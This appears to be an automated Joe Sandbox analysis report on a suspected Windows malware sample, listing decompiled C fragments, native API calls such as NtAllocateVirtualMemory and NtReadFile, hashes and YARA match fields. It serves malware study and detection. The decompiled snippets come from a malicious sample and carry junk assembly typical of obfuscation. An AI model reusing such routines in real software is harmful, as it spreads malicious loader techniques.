                                                              C-Code - Quality: 37%
                                                              			E0041E553(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				intOrPtr _t13;
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t3 = _t13 + 0xa74; // 0xa76
				_t28 = _t3;
				E0041F0F3( *((intOrPtr*)(_t13 + 0x14)), _t13, _t28,  *((intOrPtr*)(_t13 + 0x14)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t28))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _t27); // executed
				return _t18;
			}







                                                              0x0041e556
                                                              0x0041e562
                                                              0x0041e562
                                                              0x0041e56a
                                                              0x0041e598
                                                              0x0041e59c

                                                              APIs
                                                              • NtReadFile.NTDLL(00419423,004148FB,FFFFFFFF,00418F0D,00000002,?,00419423,00000002,00418F0D,FFFFFFFF,004148FB,00419423,00000002,00000000), ref: 0041E598
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_eixfhzlwqd.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 2d12266bc7a0f10b7c649805d53fb3a44196c039d978ed09e5374c20c4afdbd2
                                                              • Instruction ID: bfbc5250e59b46a91e7835dd4e66cb8fe6cc79b274a8c8468fe621ad82029034
                                                              • Opcode Fuzzy Hash: 2d12266bc7a0f10b7c649805d53fb3a44196c039d978ed09e5374c20c4afdbd2
                                                              • Instruction Fuzzy Hash: 8AF0B2B2204208AFCB14DF99DC85EEB77ADEF8C754F118259BE0DA7241D630E811CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041E67D Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 46%
                                                              			E0041E67D(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				char _v1;
				long _t14;

				asm("xlatb");
				asm("sbb dl, [ebp-0x74aac8d3]");
				_push( &_v1);
				_t10 = _a4;
				E0041F0F3( *((intOrPtr*)(_a4 + 0x14)), _t10, _t10 + 0xa8c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                              0x0041e67d
                                                              0x0041e67f
                                                              0x0041e683
                                                              0x0041e686
                                                              0x0041e69a
                                                              0x0041e6bc
                                                              0x0041e6c0

                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E6BC
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_eixfhzlwqd.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: cbbb131e94267c0f65c5cf6e91b172bb5514c91d72c6c38cbfdd67b02303b318
                                                              • Instruction ID: 3c88aeb18d78a5fcf5df2c91758d71f9b2acdd3a62a9acd145b66c1a380e9054
                                                              • Opcode Fuzzy Hash: cbbb131e94267c0f65c5cf6e91b172bb5514c91d72c6c38cbfdd67b02303b318
                                                              • Instruction Fuzzy Hash: A7F01CB6200148AFDB14DF99DC81EEB7BA9EF8C354F118259FA4C97241C631E815CBB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041E683 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E0041E683(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				E0041F0F3( *((intOrPtr*)(_a4 + 0x14)), _a4, _t10 + 0xa8c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                                              0x0041e69a
                                                              0x0041e6bc
                                                              0x0041e6c0

                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E6BC
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_eixfhzlwqd.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: c6dcf1b2085be2652a56e81aa7d61fbadce5d8b21ef35205e1b29a90b99b07af
                                                              • Instruction ID: e3df594f4391c6e7c6a06548402cde6f40c9e114ca2d2fdcc238f0be8a8e02e1
                                                              • Opcode Fuzzy Hash: c6dcf1b2085be2652a56e81aa7d61fbadce5d8b21ef35205e1b29a90b99b07af
                                                              • Instruction Fuzzy Hash: E0F015B2200208ABCB14DF89DC81EEB77ADAF8C754F118119BE0897241C630F811CBB4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041E5CD Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtClose.NTDLL(00410258,00000000,?,00410258,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E5F8
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_eixfhzlwqd.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 46392e80f2db8ec0be2b69adcf7511ab59649807821cbdb44e2432beaf966e33
                                                              • Instruction ID: d1dc89d698e8cca9051220c5f4a91fd7681493eb9a8527794acf373e7dd26a84
                                                              • Opcode Fuzzy Hash: 46392e80f2db8ec0be2b69adcf7511ab59649807821cbdb44e2432beaf966e33
                                                              • Instruction Fuzzy Hash: B6E0C232604280AFEB10DBB8EC44FC73F29EF4D664F00819AF94D9B242C275E50187A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041E5D3 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • NtClose.NTDLL(00410258,00000000,?,00410258,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E5F8
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_eixfhzlwqd.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 830b885a3245526015f54344d79e5b01ded446f9b8a9012b98a688606644bbf8
                                                              • Instruction ID: 6eaaf1127344df3c5f1721722c7164f72d5f57725391406dca1fc71f2a4fcdba
                                                              • Opcode Fuzzy Hash: 830b885a3245526015f54344d79e5b01ded446f9b8a9012b98a688606644bbf8
                                                              • Instruction Fuzzy Hash: 89D01772604214ABD610EBA9DC89FD77BACEF49664F118469BA1C5B242C571FA0086E1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041E59D Relevance: 1.5, APIs: 1, Instructions: 12nativeCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 29%
                                                              			E0041E59D(void* __eflags) {
				long _t7;
				void* _t15;
				intOrPtr* _t17;
				void* _t19;
				void* _t20;
				void* _t22;
				void* _t24;

				_t24 = _t19;
				_pop(_t20);
				if(__eflags <= 0) {
					_t7 = NtClose( *(_t20 + 0xc)); // executed
					return _t7;
				} else {
					asm("sti");
					asm("int 0x4a");
					_t22 = _t24;
					_t8 =  *((intOrPtr*)(_t22 + 8));
					_t3 = _t8 + 0xa78; // 0xa78
					_t17 = _t3;
					E0041F0F3( *((intOrPtr*)( *((intOrPtr*)(_t22 + 8)) + 0x14)), _t8, _t17,  *((intOrPtr*)( *((intOrPtr*)(_t22 + 8)) + 0x14)), 0, 0x2b);
					return  *((intOrPtr*)( *_t17))( *((intOrPtr*)(_t22 + 0xc)), _t15, _t20);
				}
			}










                                                              0x0041e59d
                                                              0x0041e59d
                                                              0x0041e59e
                                                              0x0041e5f8
                                                              0x0041e5fc
                                                              0x0041e5a0
                                                              0x0041e5a0
                                                              0x0041e5a1
                                                              0x0041e5a4
                                                              0x0041e5a6
                                                              0x0041e5b2
                                                              0x0041e5b2
                                                              0x0041e5ba
                                                              0x0041e5cc
                                                              0x0041e5cc

                                                              APIs
                                                              • NtClose.NTDLL(00410258,00000000,?,00410258,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0041E5F8
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_eixfhzlwqd.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 194cc7facbcd1ef64c079e176c18b4e28c55f590bd5f49e1efea0764544d2de0
                                                              • Instruction ID: 5f248507dfd5255cbbd48e25c2a897bd001d0206de7ec8e28bb4546cbfc8857d
                                                              • Opcode Fuzzy Hash: 194cc7facbcd1ef64c079e176c18b4e28c55f590bd5f49e1efea0764544d2de0
                                                              • Instruction Fuzzy Hash: 09B092BA6400046BDA24EADCE9828A6B3A6DE80229B11C456FD5D97302E935DE6246A4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A698F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: a7135dc3db71b0ddbbd6337a84b692773aaa3db8ec3adf7391bd5761f7c35a1f
                                                              • Instruction ID: de06ef428b3e9f0451531bbbdcc1b2b873ccd55260525c79bff139edc965d7f2
                                                              • Opcode Fuzzy Hash: a7135dc3db71b0ddbbd6337a84b692773aaa3db8ec3adf7391bd5761f7c35a1f
                                                              • Instruction Fuzzy Hash: 0190026160100502E20271694804616001A9BD0381F91C032A1055555ECA658992F171
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A69860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: b7891f9f49e71becdebe7b77431fac2f999a18427c6aceeee3c0769b1bc2796d
                                                              • Instruction ID: 14de7ebefaab9ccc24c99cd76975180ce32aafb50e1d4538848f1dae89dc26f7
                                                              • Opcode Fuzzy Hash: b7891f9f49e71becdebe7b77431fac2f999a18427c6aceeee3c0769b1bc2796d
                                                              • Instruction Fuzzy Hash: 6290027120100413E2126169490470700199BD0381F91C422A0455558D96968952F161
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A69840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: a1da4bcebe929bb43f72c8266007ca99e547f3ac72f24dc8e6743261d1f59d2a
                                                              • Instruction ID: b1f62913d1b5a8eefa9d95bd600ccb687fed96380f8c4c1820645e7f88d55fca
                                                              • Opcode Fuzzy Hash: a1da4bcebe929bb43f72c8266007ca99e547f3ac72f24dc8e6743261d1f59d2a
                                                              • Instruction Fuzzy Hash: 25900261242041526646B16948045074016ABE0381791C022A1445950C85669856E661
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A699A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 6a7420aeb782ecf547c12447f152fd5cfcee7a7eac8d76731e6912559ad73c5e
                                                              • Instruction ID: 067ae6ef6ecf2ed9457a95aad9d2030ce8d4ebd65acc2f0776cd1e7ea8259950
                                                              • Opcode Fuzzy Hash: 6a7420aeb782ecf547c12447f152fd5cfcee7a7eac8d76731e6912559ad73c5e
                                                              • Instruction Fuzzy Hash: D59002A134100442E20161694814B060015DBE1341F51C025E1095554D8659CC52B166
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A695D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4a43ba96536f12ec460432f5908869f85b387ffa6ba26767f608694cfbb9103f
                                                              • Instruction ID: 7db3bf3433d3d111e0c74b8438bfdeff5ca9c55e8b09549d2b65af344c586f88
                                                              • Opcode Fuzzy Hash: 4a43ba96536f12ec460432f5908869f85b387ffa6ba26767f608694cfbb9103f
                                                              • Instruction Fuzzy Hash: 9B9002A120200003520671694814616401A9BE0341B51C031E1045590DC5658891B165
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A69910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c3ccfefa818315a56c932ba9f18727414f48f0bf2a1463c91a9a15d646c2bf8f
                                                              • Instruction ID: 954f0f192534fd47b2bec5c401b5ccaf24c77622efc9af7bad5635ffa8b005e2
                                                              • Opcode Fuzzy Hash: c3ccfefa818315a56c932ba9f18727414f48f0bf2a1463c91a9a15d646c2bf8f
                                                              • Instruction Fuzzy Hash: 0D9002B120100402E2417169480474600159BD0341F51C021A5095554E86998DD5B6A5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A69540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 35adbdf6932017b58a6e5a063e646fe695ec9efab7abf6a6b9af4d397c0d4ce9
                                                              • Instruction ID: cfe49f623e318cb542ce5e3a865a937896d23fe001307d52be8655e90f50ffb9
                                                              • Opcode Fuzzy Hash: 35adbdf6932017b58a6e5a063e646fe695ec9efab7abf6a6b9af4d397c0d4ce9
                                                              • Instruction Fuzzy Hash: 72900265211000031206A5690B0450700569BD5391351C031F1046550CD6618861A161
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A696E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 2a1fca47144c7f952246272d8a7fb53bad401d1c68b5b49d8f254279739164a7
                                                              • Instruction ID: 991060d16746c63a908405aded9fd2bbf364c8dd12368440e248f1c24b6e11cb
                                                              • Opcode Fuzzy Hash: 2a1fca47144c7f952246272d8a7fb53bad401d1c68b5b49d8f254279739164a7
                                                              • Instruction Fuzzy Hash: 1D90027120108802E2116169880474A00159BD0341F55C421A4455658D86D58891B161
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A69A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: fe425067dcbd79483dafaf8ab44533a64aa5036bda182534721b234c15b02cda
                                                              • Instruction ID: 6a7d9573675f86a645906e1d50146a4bc0aa27aa2870921617e36955064f8eb0
                                                              • Opcode Fuzzy Hash: fe425067dcbd79483dafaf8ab44533a64aa5036bda182534721b234c15b02cda
                                                              • Instruction Fuzzy Hash: A690026160100042524171798C449064015BFE1351751C131A09C9550D85998865A6A5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A69A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 8198a632e78309de19cf8750b4041fb44720fc906d10d1b996c7b26e0a166b50
                                                              • Instruction ID: b9426e8c33b5f641d0218486de146f3416d0831e0d6beb4ba4c0fe056b57bf4c
                                                              • Opcode Fuzzy Hash: 8198a632e78309de19cf8750b4041fb44720fc906d10d1b996c7b26e0a166b50
                                                              • Instruction Fuzzy Hash: C490027120140402E20161694C1470B00159BD0342F51C021A1195555D86658851B5B1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A69660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 0bb0502f8aa8f7b0382bc76200a5ba606420a5caf1a17199441e18ea31961ff7
                                                              • Instruction ID: 781a8255d62dcf4fc3ea1261527b6b07674a87e27498999ad61092a70af80ab9
                                                              • Opcode Fuzzy Hash: 0bb0502f8aa8f7b0382bc76200a5ba606420a5caf1a17199441e18ea31961ff7
                                                              • Instruction Fuzzy Hash: 5F90027120100802E2817169480464A00159BD1341F91C025A0056654DCA558A59B7E1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A69A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: bb45c5fc85eef064fefec77598f4ed5c212abc79ee7287fe4fc54ac4c0078b89
                                                              • Instruction ID: 641623cff6d985c587d86227fca349b6099bceb6885b597bc39de05c02aa9e21
                                                              • Opcode Fuzzy Hash: bb45c5fc85eef064fefec77598f4ed5c212abc79ee7287fe4fc54ac4c0078b89
                                                              • Instruction Fuzzy Hash: 9390026121180042E30165794C14B0700159BD0343F51C125A0185554CC9558861A561
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A697A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 6010da8dd31037e0d88f68a36c7679f821afa87dfb5b1ea4c374eaa41f308d70
                                                              • Instruction ID: 231fec821eff354a2640b818d3b2afa05a7ed6fdde836660a6e06cad044f6a6f
                                                              • Opcode Fuzzy Hash: 6010da8dd31037e0d88f68a36c7679f821afa87dfb5b1ea4c374eaa41f308d70
                                                              • Instruction Fuzzy Hash: 1B90026130100003E241716958186064015EBE1341F51D021E0445554CD9558856A262
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A69780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: cc01aa95728f2a05371f761b05b96f1bfaeea0d13a0d83a2b4048cf40a91f3f6
                                                              • Instruction ID: 40a37a95f365f07569ea185ee0272378452be679f780fa51fbde9fed2cdec828
                                                              • Opcode Fuzzy Hash: cc01aa95728f2a05371f761b05b96f1bfaeea0d13a0d83a2b4048cf40a91f3f6
                                                              • Instruction Fuzzy Hash: FF90026921300002E2817169580860A00159BD1342F91D425A0046558CC9558869A361
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A69FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4efab4c3047cb3dfa1c4abadc292bbc33442e91312ff46bf5180ad7987027a36
                                                              • Instruction ID: d9ce752e7a32312a3939176bb8d94f530101acef4cb3165c33e07ba2be6f1b8d
                                                              • Opcode Fuzzy Hash: 4efab4c3047cb3dfa1c4abadc292bbc33442e91312ff46bf5180ad7987027a36
                                                              • Instruction Fuzzy Hash: 5B90027131114402E2116169880470600159BD1341F51C421A0855558D86D58891B162
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A69710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 304db442758e908d0ac0d34e6161ffae0c45046f23250b01cc32e6a7d1a92b05
                                                              • Instruction ID: 386471ae4f6d682ccc07f0809ab14a9b88e91409d86e81809b2cc46760e0c222
                                                              • Opcode Fuzzy Hash: 304db442758e908d0ac0d34e6161ffae0c45046f23250b01cc32e6a7d1a92b05
                                                              • Instruction Fuzzy Hash: 8490027120100402E20165A9580864600159BE0341F51D021A5055555EC6A58891B171
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041E7E5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E81B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_eixfhzlwqd.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID: g5@
                                                              • API String ID: 621844428-1714718609
                                                              • Opcode ID: f4cfac2b4afd38c845547e7a8b1656871c85638b2ff7da4d2fdc799425e6baee
                                                              • Instruction ID: 31db71e74d7b34bd16dbf4c3198833dabbe4fc1a54c5760f5bcfc59bb15180cd
                                                              • Opcode Fuzzy Hash: f4cfac2b4afd38c845547e7a8b1656871c85638b2ff7da4d2fdc799425e6baee
                                                              • Instruction Fuzzy Hash: CE115AB5204248BFCB14DFA9DC81DEB7BA9EF8D314F148249FA4997242C634F841CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0041E7F3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 10 41e7f3-41e80c 11 41e812-41e81b ExitProcess 10->11 12 41e80d call 41f0f3 10->12 12->11
                                                              APIs
                                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E81B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_eixfhzlwqd.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID: g5@
                                                              • API String ID: 621844428-1714718609
                                                              • Opcode ID: 1819cb8b02f300e6869e06c2a0753cee641523d35c4acbc2345e47aa399eb9c4
                                                              • Instruction ID: 634a40d582884040a61ff03526b006c9eb06106f7c9c834c0f0d411661f4cf11
                                                              • Opcode Fuzzy Hash: 1819cb8b02f300e6869e06c2a0753cee641523d35c4acbc2345e47aa399eb9c4
                                                              • Instruction Fuzzy Hash: AFD012716042147BC620DB99CC45FD7779CDF45664F118065BA4C5B242C575BA40C7E1
